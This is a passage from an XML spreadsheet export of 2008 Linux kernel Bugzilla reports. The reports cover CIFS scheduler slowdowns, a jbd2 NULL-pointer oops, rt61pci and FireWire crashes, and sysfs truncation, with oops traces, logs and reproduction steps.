    <t>Latest working kernel version:2.6.25-git4 Earliest failing kernel version:2.6.25-git5 Distribution:gentoo Hardware Environment:macbook Problem Description: both keys 49 and 94 (keycode by xev) send two events on X corresponding to 49 &amp; 94 or 94 &amp; 49 It might be useful two note in some earlier kernels the keys were reversed(49 gave 94 and 94 gave 49) which was fixed in some later kernel update. This bug has been present in mm-tree earlier. Steps to reproduce: press key 49 or 94 on macbook (keycode by xev) on my keymap this gives &lt;§ or §&lt;</t>
  </si>
  <si>
    <t>CIFS doesn't like the new fair group CPU scheduler</t>
  </si>
  <si>
    <t>2008-01-29 09:13 UTC</t>
  </si>
  <si>
    <t>Julien Muchembled</t>
  </si>
  <si>
    <t>2008-02-08 13:44 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23.14 Earliest failing kernel version: 2.6.24 Distribution: Debian/Sid Hardware Environment: AMD K7 (x86_32) Software Environment: Problem Description: With 2.6.23.14, uploading 'linux-2.6.24.tar.bz2' to a CIFS mount takes 5 s. (~ 9.5 MB/s), which is ok for a 100Mbps network: user1@client$ time cp linux-2.6.24.tar.bz2 /cifs_srv real 0m4.784s user 0m0.000s sys 0m0.090s With 2.6.24 and CONFIG_FAIR_GROUP_SCHED=y, the same test can take up to 28 s : * Test #1 # idle CPU (no process running other than 'cp') =&gt; 5 s. * Test #2 (same user) user1@client$ while do :; do :; done # priority: 0 user1@client$ time cp linux-2.6.24.tar.bz2 /cifs_srv =&gt; 5 s. * Test #3 (different user) user1@client$ while do :; do :; done # priority: 19 user2@client$ time cp linux-2.6.24.tar.bz2 /cifs_srv =&gt; 28 s. I consider it's a bug because one process only wants network bandwidth (and very few CPU cycles) and the other one only wants the remaining CPU resources. The problem doesn't happen with a simple netcat transfer. In any condition, I reach 12 MB/s : client$ dd if=/dev/zero bs=1M count=64 | nc srv 2000 64+0 enregistrements lus 64+0 enregistrements écrits 67108864 octets (67 MB) copiés, 5,61611 seconde, 11,9 MB/s Note that with CONFIG_FAIR_GROUP_SCHED not set, it can still be slower than 2.6.23.14, but that may be a different bug : * Test #4 (different user) user1@client$ while do :; do :; done # priority: 0 user2@client$ time cp linux-2.6.24.tar.bz2 /cifs_srv =&gt; 5 s. * Test #5 user1@client$ while do :; do :; done # priority: 19 user1@client$ time cp linux-2.6.24.tar.bz2 /cifs_srv =&gt; 10 s. !! (The server runs Linux 2.6.23.14 and Samba 3.0.28.)</t>
  </si>
  <si>
    <t>libata still broken for Pegasos on 2.6.24</t>
  </si>
  <si>
    <t>2008-01-29 12:56 UTC</t>
  </si>
  <si>
    <t>2008-05-03 22:42 UTC</t>
  </si>
  <si>
    <t>As 2.6.24 contains fix for pata_via on Pegasos I decide to give a try to this version. Unfortunatly it seems it is still broken. Quick look on dmesg from faulty boot shows both channels are configured to use IRQ 14 and this is not correct in this case. .... ata1: PATA max UDMA/100 cmd 0x1000 ctl 0x100c bmdma 0x1020 irq 14^ ata2: PATA max UDMA/100 cmd 0x1010 ctl 0x101c bmdma 0x1028 irq 14^ .... libata works fine on 2.6.23 when using patch https://bugzilla.redhat.com/attachment.cgi?id=167747. Reported also https://bugzilla.redhat.com/show_bug.cgi?id=430802</t>
  </si>
  <si>
    <t>just Kconfig dependencies error</t>
  </si>
  <si>
    <t>2008-01-29 19:45 UTC</t>
  </si>
  <si>
    <t>2008-05-04 04:24 UTC</t>
  </si>
  <si>
    <t>If i choose CONFIG_NVRAM = M then error message finnix linux-2.6.24 # make CHK include/linux/version.h CHK include/linux/utsrelease.h CALL scripts/checksyscalls.sh CHK include/linux/compile.h dnsdomainname: Unknown host Building modules, stage 2. MODPOST 611 modules ERROR: "pmac_newworld" [arch/powerpc/platforms/powermac/nvram.ko] undefined! ERROR: "__alloc_bootmem" [arch/powerpc/platforms/powermac/nvram.ko] undefined! If it is required, i can attach my .config</t>
  </si>
  <si>
    <t>NULL pointer deref in journal_wait_on_commit_record</t>
  </si>
  <si>
    <t>2.6.24-03997-g85004cc</t>
  </si>
  <si>
    <t>2008-01-30 03:24 UTC</t>
  </si>
  <si>
    <t>2008-01-31 03:15 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: - Earliest failing kernel version: 2.6.24-03863-g0ba6c33 Distribution: Ubuntu Problem Description: using a corrupted image causes an oops in unmount, seems as if journal_wait_on_commit_record() gets passed a NULL pointer Steps to reproduce: using fsfuzz with ext4, I'll attach the image which causes this for me one oops can be found here http://kerneloops.org/raw.php?rawid=3160&amp;msgid= here is another one with full jbd2 debugging enabled (there are a lot of log_do_checkpoint messages above this) [ 242.863778] (fs/jbd2/checkpoint.c, 308): jbd2_log_do_checkpoint: Start checkpoint [ 242.863790] (fs/jbd2/checkpoint.c, 316): jbd2_log_do_checkpoint: cleanup_journal_tail returned 1 [ 242.863810] (fs/jbd2/checkpoint.c, 308): jbd2_log_do_checkpoint: Start checkpoint [ 242.863822] (fs/jbd2/checkpoint.c, 316): jbd2_log_do_checkpoint: cleanup_journal_tail returned 1 [ 242.863842] (fs/jbd2/checkpoint.c, 308): jbd2_log_do_checkpoint: Start checkpoint [ 242.863854] (fs/jbd2/checkpoint.c, 316): jbd2_log_do_checkpoint: cleanup_journal_tail returned 1 [ 242.863874] (fs/jbd2/checkpoint.c, 308): jbd2_log_do_checkpoint: Start checkpoint [ 242.863886] (fs/jbd2/checkpoint.c, 316): jbd2_log_do_checkpoint: cleanup_journal_tail returned 1 [ 242.864017] (fs/jbd2/journal.c, 193): kjournald2: kjournald2 wakes [ 242.864027] (fs/jbd2/journal.c, 201): kjournald2: woke because of timeout [ 242.864035] (fs/jbd2/journal.c, 145): kjournald2: commit_sequence=1, commit_request=2 [ 242.864044] (fs/jbd2/journal.c, 148): kjournald2: OK, requests differ [ 242.864055] (fs/jbd2/commit.c, 415): jbd2_journal_commit_transaction: super block updated [ 242.864066] (fs/jbd2/journal.c, 1264): jbd2_journal_update_superblock: JBD: updating superblock (start 15335425, seq 2, errno 0) [ 242.864385] (fs/jbd2/commit.c, 428): jbd2_journal_commit_transaction: JBD: starting commit of transaction 2 [ 242.864409] (fs/jbd2/commit.c, 501): jbd2_journal_commit_transaction: JBD: commit phase 1 [ 242.864428] (fs/jbd2/commit.c, 519): jbd2_journal_commit_transaction: JBD: commit phase 2 [ 242.864459] (fs/jbd2/revoke.c, 537): jbd2_journal_write_revoke_records: Wrote 0 revoke records [ 242.864469] (fs/jbd2/commit.c, 561): jbd2_journal_commit_transaction: JBD: commit phase 2 [ 242.864478] (fs/jbd2/commit.c, 571): jbd2_journal_commit_transaction: JBD: commit phase 3 [ 242.864487] (fs/jbd2/commit.c, 780): jbd2_journal_commit_transaction: JBD: commit phase 4 [ 242.864496] (fs/jbd2/commit.c, 839): jbd2_journal_commit_transaction: JBD: commit phase 5 [ 242.864505] (fs/jbd2/commit.c, 866): jbd2_journal_commit_transaction: JBD: commit phase 6 [ 242.864599] attempt to access beyond end of device [ 242.864609] loop0: rw=0, want=200708, limit=16384 [ 242.864633] jbd2_journal_bmap: journal block not found at offset 15335425 on loop0 [ 242.864680] Aborting journal on device loop0. [ 242.864733] (fs/jbd2/journal.c, 1264): jbd2_journal_update_superblock: JBD: updating superblock (start 15335425, seq 2, errno -5) [ 242.864868] BUG: unable to handle kernel NULL pointer dereference at virtual address 00000000 [ 242.864962] printing eip: c023c2a7 *pde = 00000000 [ 242.865048] Oops: 0002 [#1] PREEMPT [ 242.865108] Modules linked in: [ 242.865218] [ 242.865243] Pid: 3698, comm: kjournald2 Not tainted (2.6.24-03997-g85004cc #16) [ 242.865268] EIP: 0060:[&lt;c023c2a7&gt;] EFLAGS: 00010202 CPU: 0 [ 242.865382] EIP is at journal_wait_on_commit_record+0x7/0x50 [ 242.865407] EAX: 00000000 EBX: 00000000 ECX: 00000001 EDX: 00000001 [ 242.865431] ESI: 00000000 EDI: c07835d2 EBP: cb229ee4 ESP: cb229edc [ 242.865455] DS: 007b ES: 007b FS: 0000 GS: 0000 SS: 0068 [ 242.865539] Process kjournald2 (pid: 3698, ti=cb229000 task=cb208000 task.ti=cb229000) [ 242.865564] Stack: 00000000 00000000 cb229f88 c023cb07 ffffffff c07835d2 00000362 c069c620 [ 242.865864] cb2316e0 cb231504 cb2314f0 cb134960 00000000 cb231920 00000000 00000000 [ 242.865918] cb208000 00000000 00000000 00000008 ffffffff 00000000 00000000 00000000 [ 242.865918] Call Trace: [ 242.865918] [&lt;c0104c0a&gt;] show_trace_log_lvl+0x1a/0x30 [ 242.865918] [&lt;c0104cc9&gt;] show_stack_log_lvl+0xa9/0xd0 [ 242.865918] [&lt;c0104dba&gt;] show_registers+0xca/0x250 [ 242.865918] [&lt;c01051e1&gt;] die+0x101/0x220 [ 242.865918] [&lt;c011759b&gt;] do_page_fault+0x28b/0x630 [ 242.865918] [&lt;c0682d52&gt;] error_code+0x6a/0x70 [ 242.865918] [&lt;c023cb07&gt;] jbd2_journal_commit_transaction+0x627/0x12a0 [ 242.865918] [&lt;c02422d1&gt;] kjournald2+0xd1/0x3b0 [ 242.865918] [&lt;c0136d22&gt;] kthread+0x42/0x70 [ 242.865918] [&lt;c0104667&gt;] kernel_thread_helper+0x7/0x10 [ 242.865918] ======================= [ 242.865918] Code: 8d 74 26 00 e8 db 43 44 00 e9 3e ff ff ff 8d b6 00 00 00 00 e8 cb 43 44 00 eb d1 0f 0b eb fe 90 8d 74 26 00 55 89 e5 56 89 c6 53 &lt;0f&gt; ba 30 01 b8 6b 07 78 c0 ba 3e 01 00 00 e8 d6 18 ee ff 8b 06 [ 242.865918] EIP: [&lt;c023c2a7&gt;] journal_wait_on_commit_record+0x7/0x50 SS:ESP 0068:cb229edc [ 242.865954] ---[ end trace 66f543972254226c ]--- [ 242.879551] (fs/jbd2/checkpoint.c, 308): jbd2_log_do_checkpoint: Start checkpoint [ 242.879631] (fs/jbd2/checkpoint.c, 316): jbd2_log_do_checkpoint: cleanup_journal_tail returned 1 [ 242.879731] ext4_abort called. [ 242.879755] EXT4-fs error (device loop0): ext4_journal_start_sb: Detected aborted journal [ 242.879846] Remounting filesystem read-only [ 242.897757] EXT4-fs error (device loop0): htree_dirblock_to_tree: bad entry in directory #2: inode out of bounds - offset=24, inode=11019, rec_len=2024, name_len=10 [ 243.177213] EXT4-fs error (device loop0): htree_dirblock_to_tree: bad entry in directory #2: inode out of bounds - offset=24, inode=11019, rec_len=2024, name_len=10 [ 243.501597] (fs/jbd2/journal.c, 544): jbd2_log_wait_commit: JBD: want 2, j_commit_sequence=1</t>
  </si>
  <si>
    <t>KERNEL: assertion ((int)tcp_packets_in_flight(tp) &gt;= 0) failed at net/ipv4/tcp_input.c (1274)</t>
  </si>
  <si>
    <t>2.6.22.15</t>
  </si>
  <si>
    <t>2008-01-30 13:33 UTC</t>
  </si>
  <si>
    <t>2008-07-16 07:37 UTC</t>
  </si>
  <si>
    <t>KERNEL: assertion ((int)tcp_packets_in_flight(tp) &gt;= 0) failed at net/ipv4/tcp_input.c (1274) Maybe it is somehow related to: http://www.mail-archive.com/netdev@vger.kernel.org/msg57851.html</t>
  </si>
  <si>
    <t>Compilation errors with certain options in .config</t>
  </si>
  <si>
    <t>2008-01-30 15:42 UTC</t>
  </si>
  <si>
    <t>Peter Teoh</t>
  </si>
  <si>
    <t>2008-01-31 12:59 UTC</t>
  </si>
  <si>
    <t>x86 arch updates also broke s390</t>
  </si>
  <si>
    <t>2008-01-30 16:36 UTC</t>
  </si>
  <si>
    <t>2008-02-01 01:46 UTC</t>
  </si>
  <si>
    <t>Subject : x86 arch updates also broke s390 Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/1/30/594</t>
  </si>
  <si>
    <t>rt61pci crashes in 2.6.24</t>
  </si>
  <si>
    <t>2008-01-31 14:54 UTC</t>
  </si>
  <si>
    <t>Chris Clayton</t>
  </si>
  <si>
    <t>2008-03-05 09:23 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: None - driver introduced in 2.6.24 Earliest failing kernel version: 2.6.24-rc8-git4 Distribution: Was once Peanut Linux (a Slackware derivative), but now highly customised Hardware Environment: Belkin F5D7010 (11g) wireless adapter and a Draytek Vigor 2600WE AP (11b) Software Environment: rt61pci driver on 2.6.24 kernel Problem Description: I can reliably crash the driver by running the following script: #!/bin/sh for i in `seq 1 100`; do echo $i &gt; itercount rm -f linux-2.6.23.tar.bz2 wget ftp://192.168.1.10/pub/linux-2.6.23.tar.bz2 done The most complete diagnostics I have copied from the console are: Call Trace: [&lt;c011440a&gt;] __update_rq_clock+0x1a/0xf0 [&lt;e08ff59d&gt;] rt2x00lib_txdone+0x9d/0xd0 [rt2x00lib] [&lt;e0909573&gt;] rt61pci_txdone+0x153/0x1f0 [rt61pci] [&lt;e09096ad&gt;] rt61pci_interrupt+0x9d/0xb0 [rt61pci] [&lt;c0140dc7&gt;] handle_IRQ_event+0x27/0x60 [&lt;c0141fbb&gt;] handle_level_irq+0x6b/0x100 [&lt;c014if50&gt;] handle_level_irq+0x0/0x100 [&lt;c0105db8&gt;] do_IRQ+0x68/0xc0 [&lt;c011440a&gt;] __update_rq_clock+0x1a/0xf0 [&lt;c01042f3&gt;] common_interrupt+0x23/0x28 [&lt;c014007b&gt;] encode_comp2_t+0x4b/0x80 [&lt;c011007b&gt;] acpi_copy_wakeup_routine+0x2b/0x9c [&lt;c02161fb&gt;] acpi_processor_idle+0x25b/0x36e [&lt;c01020dc&gt;] cpu_idle+0x5c/0x80 [&lt;c040381b&gt;] start_kernel+0x18b/0x1d0 [&lt;c0403360&gt;] unknown_bootoption+0x0/0x150 ======================== Code: 00 00 00 e9 6c ff ff ff 8d b6 00 00 00 00 8d bf 00 00 00 00 55 89 cd 57 56 53 83 ec 10 89 d3 89 44 24 08 ba 20 00 00 00 8b 40 58 &lt;89&gt; 43 14 a1 10 66 3e c0 e8 6c f9 82 df 89 44 24 0c 85 c0 89 c7 EIP: [&lt;e0930eb7&gt;] ieee80211_tx_status_irqsafe+0x17/0x120 [mac80211] SS:ESP 0068: c042ff4c Kernel panic - not syncing: Fatal exception in interrupt Steps to reproduce: If I start any non-trivial network activity, the crash will occur. See the thread at http://marc.info/?l=linux-wireless&amp;m=120098190722048&amp;w=4 for all info collected so far.</t>
  </si>
  <si>
    <t>agpgart support for P4M900 is not working</t>
  </si>
  <si>
    <t>2008-02-01 00:26 UTC</t>
  </si>
  <si>
    <t>2009-03-24 07:43 UTC</t>
  </si>
  <si>
    <t>Support for P4M900 was merged in to kernel some time ago, but it's not working because VT3364 entry is missing in agp_via_pci_table.</t>
  </si>
  <si>
    <t>WUSB54Gv2 device id for p54usb driver</t>
  </si>
  <si>
    <t>2008-02-01 01:48 UTC</t>
  </si>
  <si>
    <t>Cavan Carroll</t>
  </si>
  <si>
    <t>2008-02-26 06:22 UTC</t>
  </si>
  <si>
    <t>It looks like all the other versions of these prism54 based cards are already supported (looked at the inf files for the windows drivers) but version 2 isn't. Here's the lsusb -v output for my card that needs support. Bus 001 Device 004: ID 13b1:000a Linksys Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 idVendor 0x13b1 Linksys idProduct 0x000a bcdDevice 10.20 iManufacturer 1 Cisco-Linksys iProduct 2 Wireless-G USB Network Adapter iSerial 0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 53 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0x80 MaxPower 500mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 5 bInterfaceClass 255 Vendor Specific Class bInterfaceSubClass 255 Vendor Specific Subclass bInterfaceProtocol 255 Vendor Specific Protocol iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x01 EP 1 OUT bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x82 EP 2 IN bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x02 EP 2 OUT bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x83 EP 3 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0040 1x 64 bytes bInterval 1 Device Qualifier (for other device speed): bLength 10 bDescriptorType 6 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 bNumConfigurations 1</t>
  </si>
  <si>
    <t>Compilation errors for sis190.c</t>
  </si>
  <si>
    <t>2008-02-01 05:48 UTC</t>
  </si>
  <si>
    <t>2008-02-09 16:02 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Hardware Environment: Software Environment: Problem Description: drivers/net/tlan.c: In function ‘tlan_probe’: drivers/net/tlan.c:486: warning: ignoring return value of ‘pci_register_driver’, declared with attribute warn_unused_result CC [M] drivers/net/epic100.o CC [M] drivers/net/sis190.o drivers/net/sis190.c:329: error: sis190_pci_tbl causes a section type conflict make[2]: *** [drivers/net/sis190.o] Error 1 make[1]: *** [drivers/net] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Just did a "git clone" of linus tree at: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux-2.6</t>
  </si>
  <si>
    <t>chattr sticky behaviour and Orlov block allocator</t>
  </si>
  <si>
    <t>2008-02-01 07:25 UTC</t>
  </si>
  <si>
    <t>Jörg Höhle</t>
  </si>
  <si>
    <t>2009-03-24 04:19 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22 Earliest failing kernel version: 2.6.18 (oldest tested) Distribution: Ubuntu Gutsy Hardware Environment: Fujitsu Siemens C1110 laptop Software Environment: chattr 1.40.2 (12-Jul-2007), mke2fs 1.40.2 (12-Jul-2007) Problem Description: Some file attributes have sticky behaviour in ext2/3 whereas I believe it should not. Namely, a directory marked with chattr +T serves "to be the top of directory hierarchies for the purposes of the Orlov block allocator", as the manpage says. It seems wrong that subdirectories stickily inherit the +T flag: they are obviously not top-level! Even files get the T attribute this way, even though the chattr manpages only documents it for directories. References: http://lwn.net/Articles/14633/ http://lwn.net/Articles/14447/ Theodore Ts'o ext3 patch http://en.wikipedia.org/wiki/Orlov_block_allocator Steps to reproduce: The following shows the sticky behaviour: $ mkdir tests chattr -V +T tests chattr 1.40.2 (12-Jul-2007) Flags von tests wie folgt gesetzt: ----------------T- $ mkdir tests/src $ cp -dp /etc/fstab tests/src $ lsattr . tests tests/src ----------------T- ./tests ----------------T- tests/src ----------------T- tests/src/fstab I verified (using cp -dpr and ls -lifR) that indeed, the inherited T attribute causes all subdirectories to be created in inodes far apart (like with mount -o remount,oldalloc), whereas the Orlov allocator normally would put the directories next to each other. My expectation is that only e.g. /home/user{1,2,3,4,5,6} should be created spread out, whereas each user home's contents would be next each other (/home/user1/{foo,bar,etc}). The effect of this bug makes chattr +T unusable, because Orlov optimization is de facto eliminated. Regards, Jörg Höhle</t>
  </si>
  <si>
    <t>sysfs files can be truncated</t>
  </si>
  <si>
    <t>2008-02-01 09:57 UTC</t>
  </si>
  <si>
    <t>Ben Hutchings</t>
  </si>
  <si>
    <t>2008-06-02 00:30 UTC</t>
  </si>
  <si>
    <t>sysfs allows attribute files to be truncated, e.g. using ftruncate(), with the expected effect on their inode - but this doesn't change the "real" size of the file i.e. how much can be read from it. The parameter validation for reading and writing binary attribute files is based the inode size and not the size specified in the file's bin_attribute, so it can be broken by this. For example, if we try using dd to write to such a file: # pwd /sys/bus/pci/devices/0000:08:00.0 # ls -l config -rw-r--r-- 1 root root 4096 Feb 1 17:35 config # dd if=/dev/zero of=config bs=4 count=1 1+0 records in 1+0 records out # ls -l config -rw-r--r-- 1 root root 0 Feb 1 17:50 config # dd if=/dev/zero of=config bs=4 count=1 seek=128 dd: writing `config': No space left on device 1+0 records in 0+0 records out Note that after the truncation to 0 by the first use of dd, parameter validation for read and write is disabled. Most bin_attribute read and write methods also validate the size and offset, but for some this will allow out-of-range access. (I don't see this as a security issue, because access to the sysfs files is privileged anyway. But the validation should remain for safety's sake!) I think sysfs should ignore size changes or refuse them (by returning -EINVAL). The following change (modulo whitespace mangling) works for me: --- a/fs/sysfs/inode.c +++ b/fs/sysfs/inode.c @@ -59,6 +59,8 @@ if (error) return error; + iattr-&gt;ia_valid &amp;= ~ATTR_SIZE; /* ignore size changes */ + error = inode_setattr(inode, iattr); if (error) return error; --- END ---</t>
  </si>
  <si>
    <t>iTCO_wdt not working on DP35DP motherboard</t>
  </si>
  <si>
    <t>Watchdog</t>
  </si>
  <si>
    <t>2008-02-01 10:30 UTC</t>
  </si>
  <si>
    <t>2008-11-16 19:01 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: unknown Distribution: any Hardware Environment: Intel DP35DP motherboard Software Environment: Busybox watchdog Problem Description: I have noticed problem with hardware TCO watchdog, with this relatively new motherboard. Usually i can check watchdog by doing kill -9 to watchdog process, and after while machine is rebooting. iTCO_wdt with DP35DP is not rebooting machine. Probably some addresses changed. Steps to reproduce: Just load iTCO_wdt, then watchdog, then killall -9 watchdog dmesg [2271040.929553] iTCO_wdt: Intel TCO WatchDog Timer Driver v1.02 (26-Jul-2007) [2271040.930050] iTCO_wdt: Found a ICH9R TCO device (Version=2, TCOBASE=0x0460) [2271040.930164] iTCO_wdt: initialized. heartbeat=30 sec (nowayout=0) killing watchdog [2271053.400952] iTCO_wdt: Unexpected close, not stopping watchdog! 10 minutes - and system still alive.</t>
  </si>
  <si>
    <t>general protection fault loading and unloading modules</t>
  </si>
  <si>
    <t>2.6.24 + latest linux1394-git</t>
  </si>
  <si>
    <t>2008-02-01 11:28 UTC</t>
  </si>
  <si>
    <t>Jarod Wilson</t>
  </si>
  <si>
    <t>2008-03-11 05:36 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora devel Hardware Environment: Athlon 64, Ti FireWire + Via VT6307 FireWire controllers Problem Description: general protection fault encountered loading and unloading modules. Steps to reproduce: [root@xantham ~]# while : &gt; do &gt; rmmod firewire-sbp2 &gt; rmmod firewire-ohci &gt; modprobe firewire-ohci &gt; rmmod firewire-sbp2 &gt; rmmod firewire-ohci &gt; rmmod firewire-core &gt; modprobe firewire-ohci &gt; sleep 10 &gt; done After a few loops, I got the following: general protection fault: 0000 [1] SMP CPU 0 Modules linked in: firewire_sbp2 firewire_ohci firewire_core radeon drm ipt_MASQUERADE iptable_nat nf_nat bridge rfcomm l2cap bluetooth autofs4 sunrpc nf_conntrack_ipv4 ipt_REJECT iptable_filter ip_tables nf_conntrack_ipv6 xt_state nf_conntrack xt_tcpudp ip6t_ipv6header ip6t_REJECT ip6table_filter ip6_tables x_tables ipv6 cpufreq_ondemand dm_multipath parport_pc parport snd_intel8x0 snd_ac97_codec floppy ac97_bus snd_seq_dummy snd_seq_oss snd_seq_midi_event serio_raw snd_seq pcspkr snd_seq_device snd_pcm_oss crc_itu_t snd_mixer_oss k8temp hwmon snd_pcm snd_timer snd soundcore snd_page_alloc forcedeth i2c_nforce2 i2c_core button sr_mod sg cdrom pata_amd dm_snapshot dm_zero dm_mirror dm_mod shpchp sata_sil libata sd_mod scsi_mod ext3 jbd mbcache uhci_hcd ohci_hcd ehci_hcd Pid: 6, comm: events/0 Not tainted 2.6.24-9.fc9 #1 RIP: 0010:[&lt;ffffffff8818e2c0&gt;] [&lt;ffffffff8818e2c0&gt;] :firewire_core:fw_card_bm_work+0x1b9/0x292 RSP: 0018:ffff81003fa1dd30 EFLAGS: 00010002 RAX: 0000000000000001 RBX: ffff8100368e7518 RCX: 000000010009faa3 RDX: 0000000000000001 RSI: 000000010009837e RDI: 0000000000020340 RBP: ffff81003f9a7e18 R08: 0000000000000000 R09: 0000000000000001 R10: ffffffff8818e132 R11: ffffffff8818f382 R12: ffff8100368e7000 R13: ffff8100368e74a8 R14: 0000000000000286 R15: 6b6b6b6b6b6b6b6b FS: 00002aaaaaaca7b0(0000) GS:ffffffff813ee000(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 00002aaaaad5c000 CR3: 000000003a9b3000 CR4: 00000000000006a0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process events/0 (pid: 6, threadinfo ffff81003fa1c000, task ffff81003fa1a000) Stack: ffffffff810a23bd ffff81003fa1a000 ffffffff81483cd8 0000000000000046 ffffffff81483cc0 ffffe200016cb240 ffff81003fa1a8b0 0000000100006b6b 0000000000000002 ffffffff81055985 ffffffff81483cc0 ffff81003fa1a000 Call Trace: [&lt;ffffffff810a23bd&gt;] add_partial_tail+0x12/0x34 [&lt;ffffffff81055985&gt;] mark_held_locks+0x49/0x67 [&lt;ffffffff810a44a3&gt;] kfree+0xe1/0xec [&lt;ffffffff81055b36&gt;] trace_hardirqs_on+0x107/0x12a [&lt;ffffffff81053c99&gt;] lock_release_holdtime+0x27/0x49 [&lt;ffffffff8818e107&gt;] :firewire_core:fw_card_bm_work+0x0/0x292 [&lt;ffffffff8818e107&gt;] :firewire_core:fw_card_bm_work+0x0/0x292 [&lt;ffffffff81046cbe&gt;] run_workqueue+0xdf/0x1df [&lt;ffffffff81047793&gt;] worker_thread+0x0/0xe7 [&lt;ffffffff81047870&gt;] worker_thread+0xdd/0xe7 [&lt;ffffffff8104ad0a&gt;] autoremove_wake_function+0x0/0x2e [&lt;ffffffff8104abea&gt;] kthread+0x47/0x75 [&lt;ffffffff81275fb5&gt;] trace_hardirqs_on_thunk+0x35/0x3a [&lt;ffffffff8100cde8&gt;] child_rip+0xa/0x12 [&lt;ffffffff8100c4ff&gt;] restore_args+0x0/0x30 [&lt;ffffffff8104aba3&gt;] kthread+0x0/0x75 [&lt;ffffffff8100cdde&gt;] child_rip+0x0/0x12 Code: 41 83 3f 01 75 72 49 8b 87 a0 03 00 00 8b 5c 24 38 f6 40 0b RIP [&lt;ffffffff8818e2c0&gt;] :firewire_core:fw_card_bm_work+0x1b9/0x292 RSP &lt;ffff81003fa1dd30&gt; ---[ end trace 4c9652622aa156e6 ]--- A bit after that, a spinlock lockup warning: BUG: spinlock lockup on CPU#0, events/0/6, ffff8100368e74a8 (Tainted: G D) Pid: 6, comm: events/0 Tainted: G D 2.6.24-9.fc9 #1 Call Trace: &lt;IRQ&gt; [&lt;ffffffff8113213c&gt;] _raw_spin_lock+0xd7/0xfe [&lt;ffffffff8818e08b&gt;] :firewire_core:flush_timer_callback+0x0/0x5 [&lt;ffffffff812769e8&gt;] _spin_lock_irqsave+0x4e/0x5e [&lt;ffffffff8818f23e&gt;] :firewire_core:fw_flush_transactions+0x23/0xb2 [&lt;ffffffff8103fd6b&gt;] run_timer_softirq+0x166/0x1da [&lt;ffffffff8103d23d&gt;] __do_softirq+0x5e/0xe0 [&lt;ffffffff8100d0cc&gt;] call_softirq+0x1c/0x28 [&lt;ffffffff8100e6ce&gt;] do_softirq+0x31/0x86 [&lt;ffffffff8103d19b&gt;] irq_exit+0x4e/0x92 [&lt;ffffffff8101d23b&gt;] smp_apic_timer_interrupt+0x3f/0x54 [&lt;ffffffff8103b239&gt;] do_exit+0x208/0x7c8 [&lt;ffffffff8100cc0b&gt;] apic_timer_interrupt+0x6b/0x70 &lt;EOI&gt; [&lt;ffffffff810648b9&gt;] acct_collect+0xa4/0x18f [&lt;ffffffff810648b9&gt;] acct_collect+0xa4/0x18f [&lt;ffffffff8103b239&gt;] do_exit+0x208/0x7c8 [&lt;ffffffff812768ea&gt;] _spin_unlock_irq+0x26/0x27 [&lt;ffffffff8103b239&gt;] do_exit+0x208/0x7c8 [&lt;ffffffff8100d6e6&gt;] kernel_math_error+0x0/0x71 [&lt;ffffffff81276c1d&gt;] error_exit+0x0/0xa9 [&lt;ffffffff8818f382&gt;] :firewire_core:transmit_complete_callback+0x0/0x56 [&lt;ffffffff8818e132&gt;] :firewire_core:fw_card_bm_work+0x2b/0x292 [&lt;ffffffff8818e2c0&gt;] :firewire_core:fw_card_bm_work+0x1b9/0x292 [&lt;ffffffff810a23bd&gt;] add_partial_tail+0x12/0x34 [&lt;ffffffff81055985&gt;] mark_held_locks+0x49/0x67 [&lt;ffffffff810a44a3&gt;] kfree+0xe1/0xec [&lt;ffffffff81055b36&gt;] trace_hardirqs_on+0x107/0x12a [&lt;ffffffff81053c99&gt;] lock_release_holdtime+0x27/0x49 [&lt;ffffffff8818e107&gt;] :firewire_core:fw_card_bm_work+0x0/0x292 [&lt;ffffffff8818e107&gt;] :firewire_core:fw_card_bm_work+0x0/0x292 [&lt;ffffffff81046cbe&gt;] run_workqueue+0xdf/0x1df [&lt;ffffffff81047793&gt;] worker_thread+0x0/0xe7 [&lt;ffffffff81047870&gt;] worker_thread+0xdd/0xe7 [&lt;ffffffff8104ad0a&gt;] autoremove_wake_function+0x0/0x2e [&lt;ffffffff8104abea&gt;] kthread+0x47/0x75 [&lt;ffffffff81275fb5&gt;] 